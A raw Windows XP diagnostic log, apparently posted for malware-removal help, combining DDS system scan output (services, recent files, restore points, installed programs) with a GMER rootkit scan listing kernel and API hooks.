S0 auavjpga;auavjpga;c:\windows\system32\drivers\wwvdd.sys --> c:\windows\system32\drivers\wwvdd.sys [?]
S2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2013-8-12 701512]
S3 cpudrv;cpudrv;\??\c:\program files\systemrequirementslab\cpudrv.sys --> c:\program files\systemrequirementslab\cpudrv.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2014-5-9 40776]
S4 MBAMScheduler;MBAMScheduler;c:\program files\malwarebytes' anti-malware\mbamscheduler.exe [2013-8-12 418376]
.
=============== File Associations ===============
.
FileExt: .vbe: VBEFile=NOTEPAD.EXE "%1"
FileExt: .vbs: VBSFile=NOTEPAD.EXE "%1"
FileExt: .js: JSFile=NOTEPAD.EXE "%1"
FileExt: .jse: JSEFile=NOTEPAD.EXE "%1"
FileExt: .wsf: WSFFile=NOTEPAD.EXE "%1"
.
=============== Created Last 30 ================
.
2014-05-09 20:15:13 40776 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-04-24 23:05:26 2097984 ----a-w- c:\windows\system32\Incinerator32.dll
2014-04-24 23:05:10 68464 ----a-w- c:\windows\system32\drivers\PDFsFilter.sys
2014-04-24 23:05:09 41616 ----a-w- c:\windows\system32\iolobtdfg.exe
2014-04-24 23:05:09 23568 ----a-w- c:\windows\system32\smrgdf.exe
2014-04-24 23:05:09 -------- d-----w- c:\documents and settings\all users\application data\ioloGovernor
2014-04-24 23:05:07 -------- d-----w- c:\documents and settings\owner\application data\ioloGovernor
2014-04-24 23:05:06 56200 ----a-w- c:\windows\system32\offreg.dll
2014-04-24 23:04:58 -------- d-----w- c:\program files\iolo
2014-04-24 23:02:34 74703 ----a-w- c:\windows\system32\mfc45.dll
2014-04-24 23:02:34 -------- d-----w- c:\documents and settings\owner\application data\iolo
2014-04-24 23:02:34 -------- d-----w- c:\documents and settings\all users\application data\iolo
2014-04-19 05:30:03 145408 ----a-w- c:\windows\system32\javacpl.cpl
2014-04-19 05:29:50 94632 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
.
==================== Find3M ====================
.
2014-04-29 02:27:37 70832 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-04-29 02:27:37 692400 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-03-06 17:59:23 920064 ----a-w- c:\windows\system32\wininet.dll
2014-03-06 17:59:22 43520 ----a-w- c:\windows\system32\licmgr10.dll
2014-03-06 17:59:22 18944 ----a-w- c:\windows\system32\corpol.dll
2014-03-06 17:59:22 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
2014-03-06 00:46:54 385024 ----a-w- c:\windows\system32\html.iec
2014-03-04 04:18:12 936152 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symefa.sys
2014-02-26 01:59:05 13312 ------w- c:\windows\system32\xp_eos.exe
2014-02-18 01:32:41 447704 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symnets.sys
2014-02-18 01:32:41 423256 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symtdi.sys
2014-02-18 01:32:41 384728 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symtdiv.sys
2014-02-13 01:59:49 664280 ----a-w- c:\windows\system32\drivers\n360\1502000.026\srtsp.sys
2011-03-30 16:40:34 517976 ----a-w- c:\program files\DXSETUP.exe
2011-03-30 16:40:32 95576 ----a-w- c:\program files\DSETUP.dll
2011-03-30 16:40:32 1566040 ----a-w- c:\program files\dsetup32.dll
.
============= FINISH: 18:22:26.09 ===============


.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows XP Home Edition
Boot Device: \Device\HarddiskVolume1
Install Date: 2/27/2013 4:48:21 PM
System Uptime: 5/9/2014 5:41:33 PM (1 hours ago)
.
Motherboard: Dell Computer Corp. | | 02X378
Processor: Intel(R) Pentium(R) 4 CPU 2.00GHz | Microprocessor | 1992/400mhz
.
==== Disk Partitions =========================
.
A: is Removable
C: is FIXED (NTFS) - 298 GiB total, 231.427 GiB free.
D: is CDROM ()
E: is FIXED (NTFS) - 37 GiB total, 34.76 GiB free.
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP370: 2/8/2014 9:58:58 AM - System Checkpoint
RP371: 2/9/2014 10:59:51 AM - System Checkpoint
RP372: 2/9/2014 5:13:34 PM - Ace Utilities : Before Registry Cleanup
RP373: 2/10/2014 7:16:16 PM - System Checkpoint
RP374: 2/11/2014 6:45:03 PM - Software Distribution Service 3.0
RP375: 2/12/2014 12:22:46 AM - Ace Utilities : Before Registry Cleanup
RP376: 2/13/2014 11:23:34 AM - System Checkpoint
RP377: 2/14/2014 4:24:49 PM - System Checkpoint
RP378: 2/15/2014 1:46:06 PM - Removed Ask Toolbar
RP379: 2/15/2014 5:42:33 PM - Ace Utilities : Before Registry Cleanup
RP380: 2/16/2014 11:35:31 PM - System Checkpoint
RP381: 2/17/2014 3:07:04 PM - Ace Utilities : Before Registry Cleanup
RP382: 2/18/2014 6:22:23 PM - System Checkpoint
RP383: 2/19/2014 11:56:39 PM - System Checkpoint
RP384: 2/21/2014 12:04:46 AM - System Checkpoint
RP385: 2/22/2014 10:30:58 AM - Ace Utilities : Before Registry Cleanup
RP386: 2/23/2014 9:36:33 PM - System Checkpoint
RP387: 2/23/2014 11:41:32 PM - Ace Utilities : Before Registry Cleanup
RP388: 2/25/2014 11:09:32 AM - System Checkpoint
RP389: 2/26/2014 6:10:14 PM - System Checkpoint
RP390: 2/27/2014 9:22:21 PM - System Checkpoint
RP391: 2/28/2014 10:22:45 PM - System Checkpoint
RP392: 3/1/2014 3:31:03 PM - Ace Utilities : Before Registry Cleanup
RP393: 3/1/2014 4:06:42 PM - Removed SavetheChildren Reminder by We-Care.com v4.1.26.4
RP394: 3/2/2014 11:30:13 PM - Ace Utilities : Before Registry Cleanup
RP395: 3/4/2014 1:10:35 AM - System Checkpoint
RP396: 3/5/2014 2:14:11 AM - System Checkpoint
RP397: 3/6/2014 4:01:04 AM - System Checkpoint
RP398: 3/6/2014 9:39:07 AM - Software Distribution Service 3.0
RP399: 3/7/2014 1:14:14 PM - System Checkpoint
RP400: 3/8/2014 7:16:19 PM - Ace Utilities : Before Registry Cleanup
RP401: 3/9/2014 11:36:26 PM - System Checkpoint
RP402: 3/10/2014 3:06:59 AM - Ace Utilities : Before Registry Cleanup
RP403: 3/11/2014 6:06:38 AM - System Checkpoint
RP404: 3/12/2014 3:00:18 AM - Software Distribution Service 3.0
RP405: 3/12/2014 11:27:55 PM - Ace Utilities : Before Registry Cleanup
RP406: 3/14/2014 1:01:43 AM - System Checkpoint
RP407: 3/15/2014 1:27:37 AM - System Checkpoint
RP408: 3/16/2014 4:06:27 AM - System Checkpoint
RP409: 3/17/2014 10:14:49 AM - System Checkpoint
RP410: 3/18/2014 10:51:16 AM - System Checkpoint
RP411: 3/18/2014 8:28:20 PM - Software Distribution Service 3.0
RP412: 3/19/2014 10:55:32 PM - System Checkpoint
RP413: 3/21/2014 10:25:08 AM - System Checkpoint
RP414: 3/22/2014 10:53:59 AM - System Checkpoint
RP415: 3/23/2014 6:15:38 PM - System Checkpoint
RP416: 3/24/2014 7:58:08 PM - System Checkpoint
RP417: 3/25/2014 10:33:32 PM - System Checkpoint
RP418: 3/27/2014 11:31:21 AM - System Checkpoint
RP419: 3/27/2014 8:22:28 PM - Ace Utilities : Before Registry Cleanup
RP420: 3/28/2014 11:40:41 PM - System Checkpoint
RP421: 3/30/2014 12:14:17 AM - System Checkpoint
RP422: 3/31/2014 12:33:07 AM - System Checkpoint
RP423: 4/1/2014 12:57:36 AM - System Checkpoint
RP424: 4/2/2014 11:32:13 AM - System Checkpoint
RP425: 4/3/2014 2:23:09 PM - System Checkpoint
RP426: 4/4/2014 1:04:21 AM - Ace Utilities : Before Registry Cleanup
RP427: 4/5/2014 1:54:36 AM - System Checkpoint
RP428: 4/6/2014 7:08:17 AM - System Checkpoint
RP429: 4/6/2014 10:29:39 PM - Ace Utilities : Before Registry Cleanup
RP430: 4/7/2014 11:25:42 PM - System Checkpoint
RP431: 4/8/2014 4:44:30 PM - Software Distribution Service 3.0
RP432: 4/9/2014 6:45:21 PM - System Checkpoint
RP433: 4/9/2014 10:55:35 PM - Ace Utilities : Before Registry Cleanup
RP434: 4/10/2014 11:51:03 PM - System Checkpoint
RP435: 4/12/2014 2:20:48 AM - System Checkpoint
RP436: 4/13/2014 3:16:27 AM - System Checkpoint
RP437: 4/13/2014 8:47:13 AM - Ace Utilities : Before Registry Cleanup
RP438: 4/14/2014 11:29:48 AM - System Checkpoint
RP439: 4/15/2014 6:39:45 PM - System Checkpoint
RP440: 4/16/2014 4:52:18 AM - Ace Utilities : Before Registry Cleanup
RP441: 4/17/2014 11:21:09 AM - System Checkpoint
RP442: 4/18/2014 2:07:42 PM - System Checkpoint
RP443: 4/19/2014 12:28:43 AM - Installed Java 7 Update 55
RP444: 4/19/2014 10:33:31 AM - Ace Utilities : Before Registry Cleanup
RP445: 4/20/2014 4:26:30 PM - System Checkpoint
RP446: 4/21/2014 6:08:06 PM - System Checkpoint
RP447: 4/22/2014 7:34:44 PM - System Checkpoint
RP448: 4/23/2014 10:20:39 PM - System Checkpoint
RP449: 4/25/2014 12:36:51 AM - System Checkpoint
RP450: 4/26/2014 1:54:02 AM - System Checkpoint
RP451: 4/26/2014 1:57:58 PM - Ace Utilities : Before Registry Cleanup
RP452: 4/27/2014 5:14:41 PM - System Checkpoint
RP453: 4/28/2014 5:40:52 PM - System Checkpoint
RP454: 4/29/2014 5:18:30 AM - Ace Utilities : Before Registry Cleanup
RP455: 4/30/2014 10:23:29 AM - System Checkpoint
RP456: 5/1/2014 1:34:38 AM - Ace Utilities : Before Registry Cleanup
RP457: 5/2/2014 8:28:55 AM - Software Distribution Service 3.0
RP458: 5/4/2014 10:01:17 AM - System Checkpoint
RP459: 5/5/2014 1:07:26 AM - Ace Utilities : Before Registry Cleanup
RP460: 5/6/2014 5:22:24 AM - System Checkpoint
RP461: 5/7/2014 2:49:13 PM - System Checkpoint
RP462: 5/8/2014 5:58:13 PM - Ace Utilities : Before Registry Cleanup
.
==== Installed Programs ======================
.
Ace Utilities
Adobe Flash Player 13 ActiveX
Adobe Flash Player 13 Plugin
Adobe Reader XI (11.0.06)
AI RoboForm (All Users)
Compatibility Pack for the 2007 Office system
Copernic Agent Personal
Copernic Desktop Search - Home
Easy Hi-Q Recorder 2.5
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Hotfix for Windows Media Format 11 SDK (KB929399)
Hotfix for Windows Media Player 11 (KB939683)
Hotfix for Windows XP (KB2779562)
Hotfix for Windows XP (KB952287)
Hotfix for Windows XP (KB954550-v5)
Hotfix for Windows XP (KB961118)
HP LaserJet P1000 series
HPCarePackProducts
Intel(R) Extreme Graphics Driver
Intel(R) PRO Ethernet Adapter and Software
iolo technologies' System Mechanic
Java 7 Update 55
Java Auto Updater
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1 Security Update (KB2833941)
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5 SP1
Microsoft Compression Client Pack 1.0 for Windows XP
Microsoft Office Standard Edition 2003
Microsoft User-Mode Driver Framework Feature Pack 1.0
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Mozilla Firefox 28.0 (x86 en-US)
Mozilla Maintenance Service
Mp3Gain PRO
Norton Security Suite
Paint XP version 1.1
Paltalk Messenger 11.3
RarmaRadio 2.69
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697)
Security Update for Microsoft Windows (KB2564958)
Security Update for Windows Internet Explorer 8 (KB2510531)
Security Update for Windows Internet Explorer 8 (KB2792100)
Security Update for Windows Internet Explorer 8 (KB2797052)
Security Update for Windows Internet Explorer 8 (KB2809289)
Security Update for Windows Internet Explorer 8 (KB2817183)
Security Update for Windows Internet Explorer 8 (KB2829530)
Security Update for Windows Internet Explorer 8 (KB2838727)
Security Update for Windows Internet Explorer 8 (KB2846071)
Security Update for Windows Internet Explorer 8 (KB2847204)
Security Update for Windows Internet Explorer 8 (KB2862772)
Security Update for Windows Internet Explorer 8 (KB2870699)
Security Update for Windows Internet Explorer 8 (KB2879017)
Security Update for Windows Internet Explorer 8 (KB2888505)
Security Update for Windows Internet Explorer 8 (KB2898785)
Security Update for Windows Internet Explorer 8 (KB2909210)
Security Update for Windows Internet Explorer 8 (KB2909921)
Security Update for Windows Internet Explorer 8 (KB2925418)
Security Update for Windows Internet Explorer 8 (KB2936068)
Security Update for Windows Internet Explorer 8 (KB2964358)
Security Update for Windows Media Player (KB2378111)
Security Update for Windows Media Player (KB2834904-v2)
Security Update for Windows Media Player (KB2834904)
Security Update for Windows Media Player (KB952069)
Security Update for Windows Media Player (KB954155)
Security Update for Windows Media Player (KB973540)
Security Update for Windows Media Player (KB975558)
Security Update for Windows Media Player (KB978695)
Security Update for Windows Media Player 11 (KB954154)
Security Update for Windows XP (KB2115168)
Security Update for Windows XP (KB2229593)
Security Update for Windows XP (KB2296011)
Security Update for Windows XP (KB2347290)
Security Update for Windows XP (KB2360937)
Security Update for Windows XP (KB2387149)
Security Update for Windows XP (KB2393802)
Security Update for Windows XP (KB2419632)
Security Update for Windows XP (KB2423089)
Security Update for Windows XP (KB2440591)
Security Update for Windows XP (KB2443105)
Security Update for Windows XP (KB2478960)
Security Update for Windows XP (KB2478971)
Security Update for Windows XP (KB2479943)
Security Update for Windows XP (KB2481109)
Security Update for Windows XP (KB2483185)
Security Update for Windows XP (KB2485663)
Security Update for Windows XP (KB2491683)
Security Update for Windows XP (KB2506212)
Security Update for Windows XP (KB2507938)
Security Update for Windows XP (KB2508429)
Security Update for Windows XP (KB2509553)
Security Update for Windows XP (KB2535512)
Security Update for Windows XP (KB2536276-v2)
Security Update for Windows XP (KB2544893-v2)
Security Update for Windows XP (KB2566454)
Security Update for Windows XP (KB2570947)
Security Update for Windows XP (KB2584146)
Security Update for Windows XP (KB2585542)
Security Update for Windows XP (KB2592799)
Security Update for Windows XP (KB2598479)
Security Update for Windows XP (KB2603381)
Security Update for Windows XP (KB2618451)
Security Update for Windows XP (KB2619339)
Security Update for Windows XP (KB2620712)
Security Update for Windows XP (KB2624667)
Security Update for Windows XP (KB2631813)
Security Update for Windows XP (KB2646524)
Security Update for Windows XP (KB2653956)
Security Update for Windows XP (KB2655992)
Security Update for Windows XP (KB2659262)
Security Update for Windows XP (KB2661637)
Security Update for Windows XP (KB2676562)
Security Update for Windows XP (KB2686509)
Security Update for Windows XP (KB2691442)
Security Update for Windows XP (KB2698365)
Security Update for Windows XP (KB2705219-v2)
Security Update for Windows XP (KB2712808)
Security Update for Windows XP (KB2719985)
Security Update for Windows XP (KB2723135-v2)
Security Update for Windows XP (KB2727528)
Security Update for Windows XP (KB2753842-v2)
Security Update for Windows XP (KB2757638)
Security Update for Windows XP (KB2758857)
Security Update for Windows XP (KB2770660)
Security Update for Windows XP (KB2778344)
Security Update for Windows XP (KB2780091)
Security Update for Windows XP (KB2799494)
Security Update for Windows XP (KB2802968)
Security Update for Windows XP (KB2807986)
Security Update for Windows XP (KB2808735)
Security Update for Windows XP (KB2813170)
Security Update for Windows XP (KB2813345)
Security Update for Windows XP (KB2820197)
Security Update for Windows XP (KB2820917)
Security Update for Windows XP (KB2829361)
Security Update for Windows XP (KB2834886)
Security Update for Windows XP (KB2839229)
Security Update for Windows XP (KB2845187)
Security Update for Windows XP (KB2847311)
Security Update for Windows XP (KB2849470)
Security Update for Windows XP (KB2850851)
Security Update for Windows XP (KB2850869)
Security Update for Windows XP (KB2859537)
Security Update for Windows XP (KB2862152)
Security Update for Windows XP (KB2862330)
Security Update for Windows XP (KB2862335)
Security Update for Windows XP (KB2864063)
Security Update for Windows XP (KB2868038)
Security Update for Windows XP (KB2868626)
Security Update for Windows XP (KB2876217)
Security Update for Windows XP (KB2876315)
Security Update for Windows XP (KB2876331)
Security Update for Windows XP (KB2883150)
Security Update for Windows XP (KB2892075)
Security Update for Windows XP (KB2893294)
Security Update for Windows XP (KB2893984)
Security Update for Windows XP (KB2898715)
Security Update for Windows XP (KB2900986)
Security Update for Windows XP (KB2914368)
Security Update for Windows XP (KB2916036)
Security Update for Windows XP (KB2922229)
Security Update for Windows XP (KB2929961)
Security Update for Windows XP (KB2930275)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB941569)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB956802)
Security Update for Windows XP (KB956844)
Security Update for Windows XP (KB959426)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB969059)
Security Update for Windows XP (KB970430)
Security Update for Windows XP (KB971657)
Security Update for Windows XP (KB972270)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB973904)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB975467)
Security Update for Windows XP (KB975560)
Security Update for Windows XP (KB975713)
Security Update for Windows XP (KB977816)
Security Update for Windows XP (KB977914)
Security Update for Windows XP (KB978338)
Security Update for Windows XP (KB978542)
Security Update for Windows XP (KB978706)
Security Update for Windows XP (KB979309)
Security Update for Windows XP (KB979482)
Security Update for Windows XP (KB979687)
Security Update for Windows XP (KB981322)
Security Update for Windows XP (KB981997)
Security Update for Windows XP (KB982132)
Security Update for Windows XP (KB982665)
Smart WAV Converter Pro
SoundMAX
Spybot - Search & Destroy
TinEye Internet Explorer plugin 1.2
TK8 Backup 4.5
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Windows XP (KB2345886)
Update for Windows XP (KB2661254-v2)
Update for Windows XP (KB2736233)
Update for Windows XP (KB2749655)
Update for Windows XP (KB2863058)
Update for Windows XP (KB2904266)
Update for Windows XP (KB2934207)
Update for Windows XP (KB898461)
Update for Windows XP (KB951978)
Update for Windows XP (KB955759)
Update for Windows XP (KB968389)
Update for Windows XP (KB971029)
Update for Windows XP (KB973815)
WebFldrs XP
Windows Genuine Advantage Validation Tool (KB892130)
Windows Internet Explorer 8
Windows Media Format 11 runtime
Windows Media Player 11
Windows PowerShell(TM) 1.0
Windows XP Service Pack 3
.
==== Event Viewer Messages From Past Week ========
.
5/9/2014 3:52:53 PM, error: atapi [9] - The device, \Device\Ide\IdePort1, did not respond within the timeout period.
5/8/2014 5:44:17 PM, error: W32Time [17] - Time Provider NtpClient: An error occurred during DNS lookup of the manually configured peer 'time-a.nist.gov,0x1'. NtpClient will try the DNS lookup again in 15 minutes. The error was: A socket operation was attempted to an unreachable host. (0x80072751)
.
==== End Of File ===========================



GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-05-09 20:07:04
Windows 5.1.2600 Service Pack 3 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-4 WDC_WD3200AAJB-00J3A0 rev.01.03E01 298.09GB
Running: 4t7f1vyw.exe; Driver: C:\DOCUME~1\Owner\LOCALS~1\Temp\pxtdypow.sys


---- System - GMER 2.1 ----

SSDT 8968D8E0 ZwAlertResumeThread
SSDT 8968D978 ZwAlertThread
SSDT 89647840 ZwAllocateVirtualMemory
SSDT 896A5B88 ZwAssignProcessToJobObject
SSDT 89786710 ZwConnectPort
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwCreateKey [0xB1C7BF50]
SSDT 8968D708 ZwCreateMutant
SSDT 896A5A38 ZwCreateSymbolicLinkObject
SSDT 895A18F0 ZwCreateThread
SSDT 896A5C20 ZwDebugActiveProcess
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwDeleteKey [0xB1C7C1D0]
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwDeleteValueKey [0xB1C7C890]
SSDT 895D36B0 ZwDuplicateObject
SSDT 896476F0 ZwFreeVirtualMemory
SSDT 8968D7B0 ZwImpersonateAnonymousToken
SSDT 8968D848 ZwImpersonateThread
SSDT 898013A8 ZwLoadDriver
SSDT 8968DD90 ZwMapViewOfSection
SSDT 8968D6B0 ZwOpenEvent
SSDT 89596738 ZwOpenProcess
SSDT 895A2740 ZwOpenProcessToken
SSDT 896A5D70 ZwOpenSection
SSDT 895D3738 ZwOpenThread
SSDT 896A5AE0 ZwProtectVirtualMemory
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwRenameKey [0xB1C7CDF0]
SSDT 8968DA10 ZwResumeThread
SSDT 8968DBD8 ZwSetContextThread
SSDT 8968DC70 ZwSetInformationProcess
SSDT 896A5CB8 ZwSetSystemInformation
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwSetValueKey [0xB1C7CB10]
SSDT 896A5E08 ZwSuspendProcess
SSDT 8968DAA8 ZwSuspendThread
SSDT 89873408 ZwTerminateProcess
SSDT 8968DB40 ZwTerminateThread
SSDT 8968DD18 ZwUnmapViewOfSection
SSDT 89647798 ZwWriteVirtualMemory

---- Kernel code sections - GMER 2.1 ----

? SYMDS.SYS The system cannot find the file specified. !
? SYMEFA.SYS The system cannot find the file specified. !
? C:\DOCUME~1\Owner\LOCALS~1\Temp\mbr.sys The filename, directory name, or volume label syntax is incorrect. !

---- User code sections - GMER 2.1 ----

.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ntdll.dll!NtMapViewOfSection 7C90D51E 5 Bytes JMP 003B0048
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ntdll.dll!NtTerminateThread 7C90DE7E 5 Bytes JMP 00380050
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!OpenSCManagerW + A3 77DE6FF8 7 Bytes JMP 003B020E
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!LogonUserExW + 461 77DF4A04 7 Bytes JMP 003B012A
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!SystemFunction025 + 8D 77DF4C61 7 Bytes JMP 003B0682
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!SetServiceObjectSecurity + E3 77E36E64 7 Bytes JMP 003B059E
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!ChangeServiceConfigA + 193 77E36FFC 7 Bytes JMP 003B03D6
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!ChangeServiceConfig2W + 83 77E3720C 2 Bytes JMP 003B02F2
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!ChangeServiceConfig2W + 86 77E3720F 4 Bytes [57, 88, EB, F9] {PUSH EDI; MOV BL, CH; STC }
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!CreateServiceA + 193 77E373A4 7 Bytes JMP 003B04BA
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!CreateServiceW + 103 77E374AC 7 Bytes JMP 003B0766
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] USER32.dll!CreateSystemThreads + 10A 7E4317F2 7 Bytes JMP 003B092C
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] USER32.dll!DeviceEventWorker + 178 7E45A270 7 Bytes JMP 003B084A
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxParamW 7E4247AB 5 Bytes JMP 3E215545 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!CreateWindowExW 7E42D0A3 5 Bytes JMP 3E2EDC24 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxIndirectParamW 7E432072 5 Bytes JMP 3E3E7997 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxIndirectA 7E43A082 5 Bytes JMP 3E3E78C9 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxParamA 7E43B144 5 Bytes JMP 3E3E7934 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxExW 7E450838 5 Bytes JMP 3E3E779A C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxExA 7E45085C 5 Bytes JMP 3E3E77FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxIndirectParamA 7E456D7D 5 Bytes JMP 3E3E79FA C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxIndirectW 7E4664D5 5 Bytes JMP 3E3E785E C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ntdll.dll!NtMapViewOfSection 7C90D51E 5 Bytes JMP 03A40048
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ntdll.dll!NtSetInformationProcess 7C90DC9E 5 Bytes JMP 03A4012A
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!VirtualProtectEx + 6E 7C801ACF 7 Bytes JMP 03A40676
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!ReadProcessMemory + 3E 7C80220E 7 Bytes JMP 03A403D0
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!lstrlenW + 43 7C809AEC 7 Bytes JMP 03A40594
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!CreateRemoteThread + 206 7C810702 7 Bytes JMP 03A402EE
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!GetVersionExA + D3 7C810903 7 Bytes JMP 03A40758
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!GetProcessHandleCount + 35 7C862F2F 7 Bytes JMP 03A404B2
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxParamW 7E4247AB 5 Bytes JMP 3E215545 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!SetWindowsHookExW 7E42820F 5 Bytes JMP 3E2E9B99 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!CallNextHookEx 7E42B3C6 5 Bytes JMP 3E2DD1CD C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!CreateWindowExW 7E42D0A3 5 Bytes JMP 3E2EDC24 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!UnhookWindowsHookEx 7E42D5F3 5 Bytes JMP 3E2546FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxIndirectParamW 7E432072 5 Bytes JMP 3E3E7997 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxIndirectA 7E43A082 5 Bytes JMP 3E3E78C9 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxParamA 7E43B144 5 Bytes JMP 3E3E7934 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxExW 7E450838 5 Bytes JMP 3E3E779A C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxExA 7E45085C 5 Bytes JMP 3E3E77FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxIndirectParamA 7E456D7D 5 Bytes JMP 3E3E79FA C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxIndirectW 7E4664D5 5 Bytes JMP 3E3E785E C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!CreateBindCtx + B5F 774FF177 7 Bytes JMP 03A4091C
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!CoCreateInstance 774FF1D4 5 Bytes JMP 3E2EDC80 C:\WINDOWS\system32\IEFRAME.dll
